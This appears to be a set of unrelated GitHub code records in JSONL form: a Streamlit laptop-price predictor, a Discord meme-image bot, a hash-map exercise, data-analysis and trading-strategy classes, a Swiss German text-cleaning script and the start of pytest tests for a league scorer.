    \", unsafe_allow_html=True)\r\n\r\n # Brand\r\n default_company = list(data['Company'].unique()).index('Apple')\r\n company = st.selectbox('Brand', data['Company'].unique(), index=default_company)\r\n\r\n # Type of laptop\r\n type = st.selectbox('Type', data['TypeName'].unique(), index=1)\r\n\r\n # Ram present in laptop\r\n ram = st.selectbox('Ram (in GB)', data['Ram'].unique(), index=1)\r\n\r\n # Os of laptop\r\n os = st.selectbox('OS', data['OpSys'].unique(), index=0)\r\n\r\n # Weight of laptop\r\n weight = st.number_input('Weight of the laptop', 1.25)\r\n\r\n # Touchscreen available in laptop or not\r\n touchscreen = st.selectbox('Touchscreen', ['No', 'Yes'], index=0)\r\n\r\n # IPS\r\n ips = st.selectbox('IPS', ['No', 'Yes'], index=0)\r\n\r\n # Screen size\r\n screen_size = st.number_input('Screen Size', 13)\r\n\r\n # Resolution of laptop\r\n resolution = st.selectbox('Screen Resolution', ['1920x1080', '1366x768', '1600x900', '3840x2160', '3200x1800', '2880x1800', '2560x1600', '2560x1440', '2304x1440'], index=6)\r\n\r\n # Cpu\r\n cpu = st.selectbox('CPU', data['CPU_name'].unique(), index=1)\r\n\r\n # Hdd\r\n hdd = st.selectbox('HDD (in GB)', [0, 128, 256, 512, 1024, 2048], index=0)\r\n\r\n # Ssd\r\n ssd = st.selectbox('SSD (in GB)', [0, 8, 128, 256, 512, 1024], index=4)\r\n\r\n gpu = st.selectbox('GPU brand', data['Gpu brand'].unique(), index=0)\r\n\r\n left_column, right_column = st.columns(2)\r\n with left_column:\r\n pretty_result = {\"company\": company, \"type\": type, \"ram\": ram, \"weight\": weight, \"touchs_creen\": touchscreen,\r\n \"ips\": ips, \"screen_size\": screen_size, \"screen_resolution\": resolution, \"cpu\": cpu, \"hdd\": hdd, \"ssd\": ssd, \"gpu\": gpu}\r\n st.json(pretty_result)\r\n \r\n with right_column:\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n \r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets1.lottiefiles.com/private_files/lf30_zdeFcW.json\")\r\n\r\n st_lottie(lottie_coding, height=370, key=\"coding\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n if st.button('Predict'):\r\n \r\n ppi = None\r\n if touchscreen == 'Yes':\r\n touchscreen = 1\r\n else:\r\n touchscreen = 0\r\n \r\n if ips == 'Yes':\r\n ips = 1\r\n else:\r\n ips = 0\r\n\r\n X_resolution = int(resolution.split('x')[0])\r\n Y_resolution = int(resolution.split('x')[1])\r\n\r\n ppi = ((X_resolution**2)+(Y_resolution**2))**0.5/(screen_size)\r\n\r\n query = np.array([company, type, ram, weight, touchscreen, ips, ppi, cpu, hdd, ssd, gpu, os])\r\n\r\n query = query.reshape(1, 12)\r\n\r\n prediction = int(np.exp(rf.predict(query)[0]))\r\n\r\n st.title(\"Predicted price: \" + str(round(prediction*0.4))+\" CZK\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n \r\n elif choice == \"Visualisation\":\r\n # Title\r\n st.markdown(\"
    Laptop Data Visualisation
    \", unsafe_allow_html=True)\r\n\r\n st.write(\"
    Predict the price of a laptop that would suit your needs the best.
    \", unsafe_allow_html=True)\r\n\r\n from plotly import graph_objs as go\r\n st.subheader(\"Laptop Brand Count:\")\r\n company = data.groupby([\"Company\"]).size().reset_index(name='Freq')\r\n def plotly_data():\r\n fig = go.Figure([go.Bar(x=company['Company'], y=company['Freq'])])\r\n fig.update_traces(marker_color='#DC143C', marker_line_color='white', marker_line_width=1.5, opacity=1)\r\n fig.update_layout(\r\n plot_bgcolor = \"rgba(0,0,0,0)\",\r\n autosize=True,\r\n yaxis=dict(showgrid=False),\r\n xaxis_title=\"Brand\",\r\n yaxis_title=\"Amount of models\",\r\n title={'text': \"\", 'y':0.9, 'x':0.5, 'xanchor': 'center', 'yanchor': 'top'})\r\n st.plotly_chart(fig)\r\n plotly_data()\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"Laptop Ram Count:\")\r\n ram = data.groupby([\"Ram\"]).size().reset_index(name='Freq')\r\n ram['Ram'] = ram['Ram'].astype(str)\r\n def plotly_data():\r\n fig = go.Figure([go.Bar(x=ram['Ram'], y=ram['Freq'])])\r\n fig.update_traces(marker_color='#DC143C', marker_line_color='white', marker_line_width=1.5, opacity=1)\r\n fig.update_layout(\r\n plot_bgcolor = \"rgba(0,0,0,0)\",\r\n autosize=True,\r\n yaxis=dict(showgrid=False),\r\n xaxis_title=\"Ram\",\r\n yaxis_title=\"Amount of models\",\r\n title={'text': \"\", 'y':0.9, 'x':0.5, 'xanchor': 'center', 'yanchor': 'top'})\r\n st.plotly_chart(fig)\r\n plotly_data()\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"Laptop Weight Mean:\")\r\n weight = data.groupby([\"Company\"]).agg({'Weight':'mean'}).reset_index().rename(columns={\"Weight\":\"Weight mean\"})\r\n weight['Weight mean'] = round(weight['Weight mean'], 2)\r\n def plotly_data():\r\n fig = go.Figure([go.Bar(x=weight['Company'], y=weight['Weight mean'])])\r\n fig.update_traces(marker_color='#DC143C', marker_line_color='white', marker_line_width=1.5, opacity=1)\r\n fig.update_layout(\r\n plot_bgcolor = \"rgba(0,0,0,0)\",\r\n autosize=True,\r\n yaxis=dict(showgrid=False),\r\n xaxis_title=\"Company\",\r\n yaxis_title=\"Weight average in (kg)\",\r\n title={'text': \"\", 'y':0.9, 'x':0.5, 'xanchor': 'center', 'yanchor': 'top'})\r\n st.plotly_chart(fig)\r\n plotly_data()\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n \r\n elif choice == \"Model described\":\r\n # Title\r\n st.markdown(\"

    Laptop Model Described
    \", unsafe_allow_html=True)\r\n\r\n st.write(\"

    Predict the price of a laptop that would suit your needs the best.
    \", unsafe_allow_html=True)\r\n\r\n st.write(\"A random forest is a machine learning technique that's used to solve regression and classification problems.\")\r\n st.write(\"Random Forest Regression is a supervised learning algorithm that uses ensemble learning method for regression. Ensemble learning method is a technique that combines predictions from multiple machine learning algorithms to make a more accurate prediction than a single model.\")\r\n st.write(\"Random Forest Regression model is powerful and accurate. It usually performs great on many problems, including features with non-linear relationships. Disadvantages, however, include the following: there is no interpretability, overfitting may easily occur, we must choose the number of trees to include in the model.\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n \r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_ba013t74.json\")\r\n\r\n st_lottie(lottie_coding, height=200, key=\"coding\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\n elif choice == \"About\":\r\n # Title\r\n st.markdown(\"

    Laptop Price About
    \", unsafe_allow_html=True)\r\n st.write(\"

    Predict the price of a laptop that would suit your needs the best.
    \", unsafe_allow_html=True)\r\n\r\n st.write(\"I created this app to be able to predict price of a laptop that I can configure on my own. To know a new laptop price according all models on the market is essential, just wanted to make sure that the price I am going to pay will be correct :)\")\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n # CONTACT\r\n # Use local CSS\r\n def local_css(file_name):\r\n with open(file_name) as f:\r\n st.markdown(f\"\", unsafe_allow_html=True)\r\n\r\n local_css(\"style.css\")\r\n\r\n left_column, right_column = st.columns(2)\r\n with left_column:\r\n st.write(\"##\")\r\n import requests\r\n from streamlit_lottie import st_lottie\r\n\r\n def load_lottieurl(url):\r\n r = requests.get(url)\r\n if r.status_code != 200:\r\n return None\r\n return r.json()\r\n \r\n lottie_coding = load_lottieurl(\"https://assets7.lottiefiles.com/packages/lf20_naj9ijgt.json\")\r\n\r\n st_lottie(lottie_coding, height=300, key=\"coding\")\r\n \r\n with right_column:\r\n with st.container():\r\n st.header(\"Contact me: \")\r\n st.write(\"##\")\r\n # Documention: https://formsubmit.co/\r\n contact_form = \"\"\"\r\n
    \r\n \"\"\"\r\n st.markdown(contact_form, unsafe_allow_html=True)\r\n\r\n st.markdown(\"\"\"---\"\"\")\r\n\r\n st.subheader(\"More info:\")\r\n st.write(\"To see other author’s projects: https://jaroslavkotrba.com\")\r\n # ---- HIDE STREAMLIT STYLE ----\r\n hide_st_style = \"\"\"\r\n \r\n \"\"\"\r\n st.markdown(hide_st_style, unsafe_allow_html=True)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"JaroslavKotrba/AppPredictionLaptopPrice","sub_path":"AppPredictionLaptop.py","file_name":"AppPredictionLaptop.py","file_ext":"py","file_size_in_byte":13585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41759132481","text":"from discord.ext import commands\nfrom PIL import Image\nimport functions,json\nimport discord \n\n\nclass hwn(commands.Cog):\n def __init__(self,bot):\n self.bot = bot\n @commands.command()\n async def hwn(self,ctx):\n text = ctx.message.content[len(\"$hwn\"):].strip()\n text = \"he will never \" + text\n image = None\n hwn = Image.open(\"images/hwn.png\").convert(\"RGBA\")\n if len(ctx.message.attachments)>0:\n img_name = ctx.message.attachments[0].filename\n await ctx.message.attachments[0].save(img_name)\n image = Image.open(img_name).convert('RGBA')\n elif ctx.message.reference is not None:#if message was referenced\n image_message = await ctx.fetch_message(ctx.message.reference.message_id)\n if len(image_message.attachments)>0:#if referenced message has image\n img_name = image_message.attachments[0].filename\n await image_message.attachments[0].save(img_name)\n image = Image.open(img_name).convert('RGBA')\n elif image_message.content.startswith('https://tenor.com'):\n img_name = await functions.get_gif(image_message.content)\n image = Image.open(img_name)\n elif image_message.content.startswith(\"https://media.discordapp.net\"):\n img_name = image_message.content[-5:]\n if image and text is not None:\n hwn = functions.place_image(0,0,252,196,hwn,image,img_name)\n hwn = functions.place_text(400,15,hwn,text)\n hwn.save(img_name)\n await ctx.message.channel.send(file=discord.File(img_name),reference=ctx.message)\n\n @commands.command()\n async def pfft(self,ctx):\n image1 = image2 = None\n pfft = Image.open(\"images/pfft.png\").convert(\"RGBA\")\n if len(ctx.message.attachments)>0:\n img_name1 = ctx.message.attachments[0].filename\n await ctx.message.attachments[0].save(img_name1)\n image1 = Image.open(img_name1).convert('RGBA')\n if ctx.message.reference is not None:#if message was referenced\n image_message = await ctx.fetch_message(ctx.message.reference.message_id)\n if len(image_message.attachments)>0:#if referenced message has image\n img_name2 = image_message.attachments[0].filename\n await image_message.attachments[0].save(img_name2)\n image2 = Image.open(img_name2).convert('RGBA')\n elif image_message.content.startswith('https://tenor.com'):\n img_name2 = await functions.get_gif(image_message.content)\n image2 = Image.open(img_name2)\n elif image_message.content.startswith(\"https://media.discordapp.net\"):\n img_name2 = image_message.content[-5:]\n if image1 and image2 is not None:\n image1 = functions.place_image(0,3,252,196,pfft,image1,img_name1)\n image1.save(img_name1)\n pfft = functions.stackImage(image2,image1,1,img_name1)\n await ctx.message.channel.send(file=discord.File(img_name1),reference=ctx.message)\n\ndef setup(bot):\n 
bot.add_cog(hwn(bot))","repo_name":"cheesegameslive/PeteBot-Python","sub_path":"commands/hwn.py","file_name":"hwn.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3689856860","text":"from linked_list import Node, LinkedList\n#from blossom_lib import flower_definitions\n\nclass HashMap:\n def __init__(self, size):\n self.array_size = size\n self.array = [LinkedList() for i in range(size)]\n def __repr__(self):\n return str(self.array)\n\n def hash(self, key):\n hash_code = sum(key.encode())\n return hash_code\n\n def compress(self, hash_code):\n array_index = hash_code % self.array_size\n return array_index\n\n def assign(self, key, value):\n array_index = (self.compress(self.hash(key)))\n payload = Node([key, value])\n list_at_array = (self.array[array_index])\n\n for list in list_at_array:\n if(list[0]==key):\n list[1] = value\n return\n else:\n continue\n list_at_array.insert(payload)\n\n def retrieve(self, key):\n array_index = (self.compress(self.hash(key)))\n list_at_index = self.array[array_index]\n for list in list_at_index:\n if(list[0]==key):\n return list[1]\n else:\n continue\n return\n\nh = HashMap(5)\nprint(h.assign('apple', 'granny smith'))\nprint(h)\nprint(h.retrieve('apple'))\nprint(h.assign('apple', 'yummy'))\nprint(h.retrieve('apple'))\n\nflower_definitions = [['begonia', 'cautiousness'], ['chrysanthemum', 'cheerfulness'], ['carnation', 'memories'], ['daisy', 'innocence'], ['hyacinth', 'playfulness'], ['lavender', 'devotion'], ['magnolia', 'dignity'], ['morning glory', 'unrequited love'], ['periwinkle', 'new friendship'], ['poppy', 'rest'], ['rose', 'love'], ['snapdragon', 'grace'], ['sunflower', 'longevity'], ['wisteria', 'good luck']]\nblossom = HashMap(len(flower_definitions))\nfor flower in flower_definitions:\n blossom.assign(flower[0], flower[1])\n\nprint(blossom.retrieve('daisy'))\nflower_definitions.append(['dog','not cat'])\nprint(flower_definitions)","repo_name":"pattiestarfish/root","sub_path":"Python3 educational/data structures/hash tables and linked lists/blossom_hash_map.py","file_name":"blossom_hash_map.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17376584930","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*- \n# @Time : 2022/1/25 10:31\n# @Author : RuanXinWei (https://github.com/Ruan-XinWei/)\n# @File : everyMonthCommentNum.py\n# @Software: PyCharm\nimport pandas as pd\n\nfrom BookAnalysis.analysis.base import Base\n\n\nclass Analysis(Base):\n def __init__(self, filename=None):\n if filename is None:\n filename = 'bookComment.csv'\n super().__init__(filename)\n\n def getData(self):\n df: pd.DataFrame = self.df.copy()\n df['time'] = pd.to_datetime(df['time'], errors='coerce')\n df = df.dropna(subset=['time'])\n df['Month'] = df['time'].dt.month\n df = df['Month']\n data = df.value_counts(sort=False)\n # print(df.resample('1M').sum())\n return {\n 'xAxis': data.index.tolist(),\n 'yAxis': data.values.tolist()\n }\n\n\nif __name__ == '__main__':\n print(Analysis().getData())","repo_name":"ruannxw/book-analysis","sub_path":"BookAnalysis/analysis/everyMonthCommentNum.py","file_name":"everyMonthCommentNum.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"74474598088","text":"import AbstractStrategy\n\nclass 
UsingSimpleMovingAverage(AbstractStrategy):\n \"\"\"\n Use simple moving average to calculate signals and make decision\n to buy, sell or do nothing on stock market.\n \"\"\"\n\n def __init__(self, samples_amount: int=2):\n # calculating average to make sens requires one sample\n # need to calculate two moving averages and API returns 10 samples,\n # so cannot have more than 9 samples in one moving average\n self.samples_amount = min(max(1, samples_amount), 9)\n\n def get_signal(self, exchanges):\n \"\"\"\n Implement simple moving average and return signal:\n 0 -> sell\n 1 -> do nothing\n 2 -> buy\n \"\"\"\n # first moving average\n fma = sum(exchanges[len(exchanges)-self.samples_amount-1:-1]) / self.samples_amount\n # second moving average\n sma = sum(exchanges[len(exchanges)-self.samples_amount:]) / self.samples_amount\n # one before last exchange\n prev_exchange = exchanges[-2]\n # last exchange\n last_exchange = exchanges[-1]\n\n if sma - fma >= 0 and last_exchange - prev_exchange >= 0:\n return 2\n if sma - fma <= 0 and last_exchange - prev_exchange < 0:\n return 0\n return 1","repo_name":"kuboszekadr/TradingBot","sub_path":"src/strategies/UsingSimpleMovingAverage.py","file_name":"UsingSimpleMovingAverage.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35278158332","text":"# This script prepare the data for the generic language model\n# It takes the swisstext and leipzig corpus and and create a train, valid,\n# and test set. Then it adds the twitter corpus to create another train,\n# valid, and test set.\n# Finally, it creates a test set using the whatsapp corpus.\n# All files are saved as .txt files.\n# The goal is to compare how generalizable the swisstext/leipzig corpus is\n# compared to a swisstext/leipzig/twitter corpus.\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport os\nfrom pathlib import Path\nfrom preprocessing.cleaner import *\nfrom tqdm import tqdm\nfrom phrasal.norm_punc import *\n\n### Settings #################################################################\nleipzig_path = \"data/leipzig_over_99.csv\"\nswisstext_path = \"data/swisscrawl_over_99.csv\"\ntwitter_path = \"data/twitter_over_99.csv\"\nwhatsapp_path = \"data/whatsapp_over_99.csv\"\noutput_dir_sl = \"data/swisstext_leipzig\"\noutput_dir_tsl = \"data/twitter_swisstext_leipzig\"\noutput_dir_whatsapp = \"data/whatsapp/\"\n################################################################################\n\n# regexs to remove urls, mentions, and hashtags\npreprocessing_regex = [('https?[\\w\\.\\:\\-\\/]*($|\\s)', ' '),\n ('www\\.[\\w\\.\\:\\-\\/]*($|\\s)', ' '),\n ('@\\S*($|\\s)', ' '),\n ('#\\S*($|\\s)', ' ')]\n\n# good characters set. 
Any sentence with characters not in this set will be\n# removed.\n\ndef remove_sentences_with_special_chars(sentences):\n chars_ok = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n chars_ok += \"ÀÁÂÄÈÉÊËÍÌÎÏÓÒÔÖÚÙÛÜàáâäèéêëìíîïôöòóüùúûÿ\"\n chars_ok += \" -,.?!0123456789%&\\\"\\'()/$*+:;<=>[]\\\\^_{}|\\\\~€°²#\"\n chars_ok = set(chars_ok)\n\n return [x for x in sentences if len(set(x).difference(chars_ok))==0]\n\ndef remove_sentences_with_special_words(sentences, max_char):\n \"\"\"Remove sentences with words containing too much special characters.\n \"\"\"\n\n chars_ok = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n chars_ok += \"ÀÁÂÄÈÉÊËÍÌÎÏÓÒÔÖÚÙÛÜàáâäèéêëìíîïôöòóüùúûÿ\"\n chars_ok += \"0123456789\"\n chars_ok = set(chars_ok)\n\n res = []\n for sentence in tqdm(sentences):\n words = sentence.split()\n ok = True\n for word in words:\n if len([c for c in word if c not in chars_ok]) > max_char:\n ok = False\n if ok:\n res.append(sentence)\n return res\n\n# load the datasets\ndf_leipzig = pd.read_csv(leipzig_path, header=None, sep=\"\\t\")\nleipzig_sentences = list(df_leipzig.iloc[:, 0])\nprint(f\"leipzig length : {len(leipzig_sentences)}\")\nleipzig_sentences = remove_sentences_with_special_chars(leipzig_sentences)\nleipzig_sentences = remove_sentences_with_special_words(leipzig_sentences, 3)\nprint(f\"leipzig filtered length : {len(leipzig_sentences)}\")\nprint(leipzig_sentences[0])\nprint(leipzig_sentences[-1])\n\ndf_swisstext = pd.read_csv(swisstext_path, header=None, sep=\"\\t\")\nswisstext_sentences = list(df_swisstext.iloc[:, 0])\nprint(f\"swisstext length : {len(swisstext_sentences)}\")\nswisstext_sentences = remove_sentences_with_special_chars(swisstext_sentences)\nswisstext_sentences = remove_sentences_with_special_words(swisstext_sentences, 3)\nprint(f\"swisstext filtered length : {len(swisstext_sentences)}\")\nprint(swisstext_sentences[0])\nprint(swisstext_sentences[-1])\n\ndf_twitter = pd.read_csv(twitter_path, header=None, sep=\"\\t\")\ntwitter_sentences = list(df_twitter.iloc[:, 0])\nprint(f\"twitter length : {len(twitter_sentences)}\")\ntwitter_sentences = remove_sentences_with_special_chars(twitter_sentences)\ntwitter_sentences = remove_sentences_with_special_words(twitter_sentences, 3)\nprint(f\"twitter filtered length : {len(twitter_sentences)}\")\nprint(twitter_sentences[0])\nprint(twitter_sentences[-1])\n\ndf_whatsapp = pd.read_csv(whatsapp_path, header=None, sep=\"\\t\")\nwhatsapp_sentences = list(df_whatsapp.iloc[:, 0])\nprint(f\"whatsapp length : {len(whatsapp_sentences)}\")\nwhatsapp_sentences = remove_sentences_with_special_chars(whatsapp_sentences)\nwhatsapp_sentences = remove_sentences_with_special_words(whatsapp_sentences, 3)\nprint(f\"whatsapp filtered length : {len(whatsapp_sentences)}\")\nprint(whatsapp_sentences[0])\nprint(whatsapp_sentences[-1])\n\n### cleaning ###\n\ndef clean_text(text):\n text = Cleaner.preprocess(text, preprocessing_regex)\n text = normalize_text(text, strip_emojis=True)\n text = Cleaner.remove_smileys(text)\n text = Cleaner.remove_hat_element(text)\n text = Cleaner.remove_html_entities(text)\n text = Cleaner.clean_punc(text)\n text = Cleaner.remove_groups_of_special_chars(text, 2)\n text = Cleaner.remove_special_duplication(text)\n text = Cleaner.remove_isolated_special_chars(text)\n return text\n\nleipzig_sentences = [clean_text(x) for x in tqdm(leipzig_sentences)]\nleipzig_sentences = [x for x in leipzig_sentences if len(x.split()) >= 5]\nprint(f\"leipzig final length : 
{len(leipzig_sentences)}\")\nswisstext_sentences = [clean_text(x) for x in tqdm(swisstext_sentences)]\nswisstext_sentences = [x for x in swisstext_sentences if len(x.split()) >= 5]\nprint(f\"swisstext final length : {len(swisstext_sentences)}\")\ntwitter_sentences = [clean_text(x) for x in tqdm(twitter_sentences)]\ntwitter_sentences = [x for x in twitter_sentences if len(x.split()) >= 5]\nprint(f\"twitter final length : {len(twitter_sentences)}\")\nwhatsapp_sentences = [clean_text(x) for x in tqdm(whatsapp_sentences)]\nwhatsapp_sentences = [x for x in whatsapp_sentences if len(x.split()) >= 5]\nprint(f\"whatsapp final length : {len(whatsapp_sentences)}\")\n\n### splitting into sets ###\n\ndef split_sets(sentences, train_proportion, valid_proportion):\n random.shuffle(sentences)\n first_break = train_proportion\n second_break = train_proportion + valid_proportion\n sets = np.split(sentences, [int(first_break*len(sentences)),\n int(second_break*len(sentences))])\n return [list(x) for x in sets]\n\nleipzig_sets = split_sets(leipzig_sentences, 0.8, 0.1)\nprint(\"Leipzig\")\nfor i, name in enumerate([\"Train\", \"Valid\", \"Test\"]):\n print(f\"{name} : {len(leipzig_sets[i])}\")\nswisstext_sets = split_sets(swisstext_sentences, 0.8, 0.1)\nprint(\"Swisstext\")\nfor i, name in enumerate([\"Train\", \"Valid\", \"Test\"]):\n print(f\"{name} : {len(swisstext_sets[i])}\")\ntwitter_sets = split_sets(twitter_sentences, 0.8, 0.1)\nprint(\"Twitter\")\nfor i, name in enumerate([\"Train\", \"Valid\", \"Test\"]):\n print(f\"{name} : {len(twitter_sets[i])}\")\n\n### merging ###\n\nprint(\"Swisstext / Leipzig\")\nsl_sets = dict()\nsl_sets[\"train\"] = list(set(leipzig_sets[0] + swisstext_sets[0]))\nrandom.shuffle(sl_sets[\"train\"])\nprint(f\"Train : {len(sl_sets['train'])}\")\nsl_sets[\"valid\"] = list(set(leipzig_sets[1] + swisstext_sets[1]))\nrandom.shuffle(sl_sets[\"valid\"])\nprint(f\"Valid : {len(sl_sets['valid'])}\")\nsl_sets[\"test\"] = list(set(leipzig_sets[2] + swisstext_sets[2]))\nrandom.shuffle(sl_sets[\"test\"])\nprint(f\"Test : {len(sl_sets['test'])}\")\nsl_sets[\"test_20k\"] = sl_sets[\"test\"][:20000]\n\nprint(\"Twitter / Swisstext / Leipzig\")\ntsl_sets = dict()\ntsl_sets[\"train\"] = list(set(sl_sets[\"train\"] + twitter_sets[0]))\nrandom.shuffle(tsl_sets[\"train\"])\nprint(f\"Train : {len(tsl_sets['train'])}\")\ntsl_sets[\"valid\"] = list(set(sl_sets[\"valid\"] + twitter_sets[1]))\nrandom.shuffle(tsl_sets[\"valid\"])\nprint(f\"Valid : {len(tsl_sets['valid'])}\")\ntsl_sets[\"test\"] = list(set(sl_sets[\"test\"] + twitter_sets[2]))\nrandom.shuffle(tsl_sets[\"test\"])\nprint(f\"Test : {len(tsl_sets['test'])}\")\ntsl_sets[\"test_20k\"] = tsl_sets[\"test\"][:20000]\n\nprint(\"Whatsapp\")\nw_sentences = list(set(whatsapp_sentences))\nprint(f\"Full : {len(w_sentences)}\")\n\n### Saving on disk ###\n\nPath(output_dir_sl).mkdir(parents=True, exist_ok=True)\nPath(output_dir_tsl).mkdir(parents=True, exist_ok=True)\nPath(output_dir_whatsapp).mkdir(parents=True, exist_ok=True)\n\nfor name in [\"train\", \"valid\", \"test\", \"test_20k\"]:\n path = os.path.join(output_dir_sl, name + \".csv\")\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write('\\n'.join(sl_sets[name]) + '\\n')\n\nfor name in [\"train\", \"valid\", \"test\", \"test_20k\"]:\n path = os.path.join(output_dir_tsl, name + \".csv\")\n with open(path, \"w\", encoding=\"utf8\") as f:\n f.write('\\n'.join(tsl_sets[name]) + '\\n')\n\npath = os.path.join(output_dir_whatsapp, \"full.csv\")\nwith open(path, \"w\", encoding=\"utf8\") as f:\n 
f.write('\\n'.join(w_sentences) + '\\n')\n","repo_name":"Karexar/gsw_language_model","sub_path":"preprocessing/generic/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":8438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8539770846","text":"from . import Plugin\n\n\nclass SqsPlugin(Plugin):\n targets = [\n {\n 'match': '^servers\\.(?P[^\\.]+)\\.sqs\\.(?P[^\\.]+)\\.(?P[^\\.]+)\\.(?PApproximateNumberOfMessages.*)$',\n 'target_type': 'gauge',\n 'tags': {'unit': 'Msg'}\n }\n ]\n\n# vim: ts=4 et sw=4:\n","repo_name":"vimeo/graph-explorer","sub_path":"graph_explorer/structured_metrics/plugins/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1063,"dataset":"github-code","pt":"16"} +{"seq_id":"22476558714","text":"import pytest\nfrom classes.League import League\nfrom classes.Team import Team\nfrom classes.Match import Match\nimport utilities.constants as const\nimport datetime\nimport utilities.util as util\n\ndef getMockLeagueForFindTeamTests():\n mockLeague = League(\"testName\",\"testCountry\")\n mockLeague.teams.append(Team(\"name1\",\"player1\"))\n mockLeague.teams.append(Team(\"name2\",\"player2\"))\n mockLeague.teams.append(Team(\"name3\",\"player3\"))\n mockLeague.teams.append(Team(\"name4\",\"player4\"))\n mockLeague.teams.append(Team(\"name5\",\"player5\"))\n return mockLeague\n\ndef test_filterMatches_filters_matches_not_involving_player_teams():\n myLeague = League(\"league1\",\"country1\")\n \n match1 = Match()\n match1.awayTeam = \"team1\"\n match1.homeTeam = \"team2\"\n \n match2 = Match()\n match2.awayTeam = \"team3\"\n match2.homeTeam = \"not a real team\"\n \n match3 = Match()\n match3.awayTeam = \"teamNo\"\n match3.homeTeam = \"team2\"\n \n match4 = Match()\n match4.awayTeam = \"noTeam\"\n match4.homeTeam = \"nah\"\n \n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n team3 = Team(\"team3\",\"player3\")\n \n myLeague.matches.extend([match1,match2,match3,match4])\n myLeague.teams.extend([team1,team2,team3]) \n \n myLeague.filterMatches()\n assert len(myLeague.matches) == 3\n assert myLeague.matches == [match1,match2,match3]\n\ndef test_calculatePointsForMatches_calculates_points_correctly():\n myLeague = League(\"league1\",\"country1\")\n match1 = Match(None,\"team1\",1,\"team2\",1)\n match1.homeTeamIsPlayerTeam = True\n match1.awayTeamIsPlayerTeam = True\n\n match2 = Match(None,\"team3\",4,\"team4\",2)\n match2.homeTeamIsPlayerTeam = True\n match2.awayTeamIsPlayerTeam = False\n \n match3 = Match(None,\"team5\",3,\"team6\",0)\n match3.homeTeamIsPlayerTeam = False\n match3.awayTeamIsPlayerTeam = True\n\n team1 = Team(\"team1\",\"player1\")\n team2 = Team(\"team2\",\"player2\")\n team3 = Team(\"team3\",\"player3\")\n \n myLeague.matches.extend([match1,match2,match3])\n myLeague.teams.extend([team1,team2,team3])\n \n myLeague.calculatePointsForMatches()\n assert match1.points == 10 #draw (5) with multiplier (5*2)\n assert match2.points == 0\n assert match3.points == 20\n\ndef test_calculatePointsForMatches_calculates_bonus_points_correctly_for_4_goal_win_rule():\n const.FOUR_GOAL_WIN_RULE = True\n myLeague = League(\"league1\",\"country1\")\n match1 = Match(None,\"team1\",4,\"team2\",0)\n match1.homeTeamIsPlayerTeam = True\n match1.awayTeamIsPlayerTeam = True\n\n match2 = Match(None,\"germany\",7,\"brazil\",1)\n match2.homeTeamIsPlayerTeam = True\n match2.awayTeamIsPlayerTeam = 
